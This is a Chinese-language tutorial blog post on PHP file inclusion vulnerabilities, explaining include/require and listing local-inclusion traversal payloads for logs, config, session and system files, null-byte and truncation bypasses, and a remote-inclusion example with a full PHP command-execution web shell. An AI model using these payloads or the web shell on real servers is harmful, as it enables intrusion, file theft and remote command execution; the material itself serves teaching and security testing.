php文件包含

作者: windbsy | 来源:发表于2018-07-27 19:46 被阅读0次

2019-09-02 文件包含和几个伪协议
【文件包含】PHP文件包含漏洞
php文件包含
PHP文件包含
[PHP] php执行顺序（include和require）
PHP 基础知识总结
php安全
php文件包含漏洞
PHP入门
凡诺CMS一处文件包含漏洞

原因：
程序员写程序的时候，不喜欢干同样的事情，也不喜欢把同样的代码（比如一些公用的函数）写几次，于是就把需要公用的代码写在一个单独的文件里面，比如 share.php，而后在其它文件进行包含调用。服务器通过某些php函数去包含任意文件时，由于要包含的这个文件来源不明，可能是一个恶意的文件，从而造成攻击。

涉及到的函数：
include()
使用此函数，只有代码执行到此函数时才将文件包含进来，发生错误时只警告并继续执行整个php文件。
Include_once()
这个函数跟include函数作用几乎相同，只是他在导入函数之前先检测下该文件是否被导入。如果已经执行一遍那么就不重复执行了。
require()
使用此函数，只要程序执行，立即调用此函数包含文件，发生错误时，会输出错误信息并立即终止程序。
require_once()
功能和前者一样，区别在于当重复调用同一文件时，程序只调用一次。

如何利用：
1.本地文件包含漏洞
(1)普通的本地文件包含
<?php include(“includes/” . $_GET['file']); ?>
当网站对参数没有进行任何过滤时，我们可以包含一个不存在的文件就会爆出当前的绝对路径。

包含同路径下的文件：
?file=.htaccess
路径遍历：
?file=../../../../../../../../../var/lib/locate.db
(该文件非常有趣因为它允许你搜索文件系统)
包含注入PHP代码的文件:
?file=../../../../../../../../../var/log/apache/error.log
包含同目录下的文件：
?file=.htaccess
目录遍历
?file=../…/../var/lib/flag.txt
包含错误的日志
?file=../../../var/log/access.log
常见的一些路径
/var/log/apache/access_log
/var/www/logs/access_log
/var/log/asscess_log
获取web目录或者其他的配置文件
?file=../../../httpd.conf
包含上传的附件
?file=../../../xx.file
读取session文件
/file=../../../tmp/sess_tnrdo

(2)有限制的本地包含
<?php include(“inc/” . $GET[‘file’] . “.htm”); ?>

%00截断：
?file=../../../etc/pwd%00
%00截断目录遍历
?../../../../www/%00
路径长度截断：
？file=../../../etc/pwd/././.[…]/././.
点号截断：
?file=../../../boot.ini/….[…]………

2.远程文件包含
如果目标主机的”allow_url_fopen”是激活的（默认是激活的），allow_url_include是激活的(默认关闭)，被包含的遍历前没有目录的限制。
我们可以指定其它 URL上的一个包含PHP代码的webshell来直接运行，比如，我先写一段运行命令的PHP代码，如下保存为cmd.txt。

<?php
if (get_magic_quotes_gpc()){
$_REQUEST["cmd"]=stripslashes($_REQUEST["cmd"]);}　//去掉转义字符（可去掉字符串中的反斜线字符）
ini_set(“max_execution_time”,0);　//设定针对这个文件的执行时间，0为不限制.
echo ”M4R10开始行”;　　　　　　 //打印的返回的开始行提示信息
passthru($_REQUEST["cmd"]);　　　//运行cmd指定的命令
echo ”M4R10结束行”;　　　　　　 //打印的返回的结束行提示信息
?>

把这个文件保存到我们主机的服务器上（可以是不支持PHP的主机），只要能通过HTTP访问到就可以了。
构造参数page=http://www.xxx.cn/cmd.txt?cmd=ls，其中cmd后面的就是你需要执行的命令。